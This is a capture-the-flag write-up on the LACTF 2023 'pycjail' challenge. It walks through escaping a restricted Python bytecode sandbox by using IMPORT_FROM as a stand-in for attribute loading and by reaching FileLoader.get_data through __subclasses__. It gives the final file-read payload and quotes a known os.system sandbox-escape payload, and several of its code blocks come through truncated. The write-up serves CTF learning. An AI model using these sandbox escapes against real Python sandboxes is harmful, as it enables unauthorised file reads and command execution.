Writeup - Pycjail (LACTF 2023)
LACTF 2023 - Pycjail Writeup
- Type - jail
- Name - pycjail
- Points - 495
Description
1 | All of you think you're so cute with your fancy little sandbox bypasses, but jokes on |
Writeup
This challenge required you to bypass a Python jail, which limited several aspects of a custom code
object you created. The source code for the jail is here, or below:
1 | #!/usr/local/bin/python3 |
To summarize the code above, you provided the co_consts
, co_names
, and co_code
bytes for a custom code
object that was created and ran. The restrictions imposed were:
- max 3 consts
- max 4 names
- max 15 opcodes
- opcodes can’t be in
['IMPORT_NAME', 'MAKE_FUNCTION', 'STORE_SUBSCR', 'DELETE_SUBSCR', 'LOAD_BUILD_CLASS', 'LOAD_ASSERTION_ERROR', 'STORE_NAME', 'DELETE_NAME', 'STORE_ATTR', 'DELETE_ATTR', 'STORE_GLOBAL', 'DELETE_GLOBAL', 'LOAD_NAME', 'LOAD_ATTR', 'JUMP_FORWARD', 'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP', 'JUMP_ABSOLUTE', 'POP_JUMP_IF_FALSE', 'POP_JUMP_IF_TRUE', 'LOAD_GLOBAL', 'JUMP_IF_NOT_EXC_MATCH', 'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST', 'LOAD_CLOSURE', 'LOAD_DEREF', 'STORE_DEREF', 'DELETE_DEREF', 'LOAD_CLASSDEREF', 'LOAD_METHOD']
(aka no import/makefunc/load/store/delete/jump) - opcode values can’t be > 3
Nothing about the flag was mentioned, so it was likely in /flag.txt
or ./flag.txt
, or if they were evil they’d require you to get RCE to read the flag. I was banking on the fact that it was stored in /flag.txt
or ./flag.txt
, so my goal was to get arbitrary read.
Approaching the Problem
I made a list of all the Python 3.10 opcodes that were allowed in this jail by pulling from the documentation and removing the opcodes banned in the list above. What caught my eye initially was that the opcodes CALL_FUNCTION
and CALL_METHOD
were not banned, and this is what allows you to call a function on the stack. However, the hard part was getting a callable object on the stack in the first place. The opcodes LOAD_GLOBAL
, LOAD_NAME
, LOAD_METHOD
, and LOAD_ATTR
are typically used to get a function on the stack, and all LOAD
opcodes were blocked except for LOAD_CONST
(which only allowed us to put strings on the stack). As an example, below shows the bytecode for the line open("flag.txt").read()
:
1 | compile('open("flag.txt").read()','pycjail','eval')) dis.dis( |
To test various payloads with the provided main.py
script, I created this small script to give me the info I want:
1 | import dis |
Based on the provided code_str
, it would show me a disassembly of the code, along with co_consts
, co_names
, and co_code
in the form desired.
Now that I was set up to try stuff, I went through the Python bytecode documentation, opcode by opcode, trying to see if there was anything that would put a callable on the stack. Many of the opcodes were eliminated from the start, such as BINARY_*
, UNARY_*
, INPLACE_*
, POP_*
, ROT_*
, and DUP_*
. CALL_*
were going to be useful later on, but wouldn’t help us get a callable onto the stack. After spending about an hour with a teammate looking through the opcodes, we felt like there wasn’t anything there. So we did what anyone would do and asked ChatGPT (no, it wasn’t helpful).
Turning Point
Desparate, we did some more research online with CTF writeups until I came across a write-up by kmh from DiceCTF 2021. The challenge TI-1337 Plus CE
was also a pyjail, and one of the things this user learned was that “IMPORT_FROM
is LOAD_ATTR
in disguise!”.
The opcode IMPORT_FROM
was not banned, but we hadn’t paid much attention to it because it always follows (and only functions properly with) the opcode IMPORT_NAME
, which was banned. However, if we could use it to function as LOAD_ATTR
, then that means we could get a callable onto the stack, and through attribute stacking run some code like "".__class__.__base__.__subclasses__()[144]()._module.__builtins__["eval"]("insert code here")
.
It was also apparent that since using IMPORT_FROM
in place of LOAD_ATTR
isn’t any default behavior for the Python interpreter, we would have to manually create custom bytecode to be successful. This actually made sense; normally, pyjails just ask for a line of code (single input()
call), but this one had you specify certain parts of the code
object you wanted to create. However, understanding the Python bytecode wouldn’t be typical or even perhaps technically compliant explained the challenge author’s design choice.
Manual testing confirmed our suspicion that IMPORT_FROM
worked as desired, so it was now time to create a payload.
Developing a Payload With Restrictions
A lot of testing and trial & error was performed at this point to get a payload that would work. Getting the payload "".__class__.__base__.__subclasses__
to work was fairly simple, however we ran into errors doing "".__class__.__base__.__subclasses__()
.
1 | $ python3 main.py |
The opcode used above was CALL_METHOD
, so I tried CALL_FUNCTION
and it works! Apparently the two ways for calling functions is by pairing LOAD_METHOD
and CALL_METHOD
, or LOAD_ATTR
and CALL_FUNCTION
.
The next issue we ran into was getting a number on the stack. Because main.py
used the input()
function to get the data, everything was treated as a string. Inserting 1
as a const would always have it render as '1'
. After some research, we settled on the GET_LEN
opcode, which just ran the len()
function on the item on top of the stack. Since our first constant was just an empty string, and the actual value of the string didn’t matter (aka "".__class__
and "abcd".__class__
are the same), we could load that const onto the stack again and run GET_LEN
to put the length of that string onto the stack. We could just set the length of the initial string to whatever we want to obtain the desired integer.
However, a second hiccup was encountered that required 2 additional opcodes to bypass. GET_LEN
pushed the integer we wanted onto the stack, but kept the loaded string on there too, which we didn’t want. I had to insert an extra ROT_TWO
and POP_TOP
opcode to switch the order and remove the string from the opcode.
At this point, the payload we had was:
1 | Python code: 'aaaa...aaa'.__class__.__base__.__subclasses__()[14] |
We had 2 consts, 1 name, and 4 opcodes left to get what we wanted, but we had access to an extensive list of classes that opened up functionality a lot.
The “stereotypical” payload from HackTricks is to use ''.__class__.__bases__.__subclasses__()[144]()._module.__builtins__['__import__']('os').system('ls')
to run system commands (note that this was slightly modified from the Python2 version, and the exact index of <class 'warnings.catch_warnings'>
may vary depending on your installation & version). The problem with this payload was it required another 3 names (_module
, __builtins__
, system
) and 3 consts ('__import__'
, 'os'
, 'ls'
), which we didn’t have. We considered making our first const of length 144 the same as our last const (padding our bash payload with extra ;
s until we reached our desired length), but we still had 2 extra names.
Our second thought was "".__class__.__base__.__subclasses__()[144]()._module.__builtins__["eval"]("insert code here")
, but that required 2 names and 2 consts (still 1 too many names).
After perusing the list of available classes one by one, I started looking into the class at index 118, which was <class '_frozen_importlib_external.FileLoader'>
. Looking at this class’s attributes, I saw the function get_data()
, which required two arguments for the path of a file. Excited, I wrote up and tested the code ("a"*118).__class__.__base__.__subclasses__()[118].get_data('flag.txt','flag.txt')
, and my local flag was printed! This only required 1 extra name and const (we even had one const leftover), and used exactly 4 more opcodes.
Final Payload
The final payload was:
1 | ''.__class__.__base__.__subclasses__()[118].get_data('flag.txt','flag.txt') |
Flag: flag{maybe_i_should_only_allow_nops_next_time}